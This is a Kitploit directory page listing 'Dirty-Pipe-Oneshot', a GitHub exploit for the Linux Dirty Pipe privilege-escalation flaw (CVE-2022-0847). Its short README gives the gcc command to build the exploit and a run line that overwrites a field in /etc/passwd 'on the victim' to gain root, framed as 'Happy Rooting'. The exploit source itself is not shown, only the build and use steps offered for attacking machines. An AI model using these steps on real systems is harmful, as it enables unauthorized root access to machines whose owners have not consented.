Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Dirty-Pipe-Oneshot — Compled version of CVE-2022-0847 aka Dirty Pipe. Just one shot to root them all :D | Kitploit
Tools/GitHubGitHub/b4dboy17/dirty-pipe-oneshot
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubb4dboy17/dirty-pipe-oneshot

Dirty-Pipe-Oneshot

Compled version of CVE-2022-0847 aka Dirty Pipe. Just one shot to root them all :D

View Repository
1213 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Dirty-Pipe-Oneshot

Compiled version of CVE-2022-0847 aka Dirty Pipe. Just one shot to root them all :D


just comple the cve-2022-0847.c file

root@kitploit:~
gcc cve-2022-0847.c -o getroot

then execute it on the victim & get root :D

root@kitploit:~
./getroot /etc/passwd 1 ootz:

Happy Rooting 🎭

Download Tool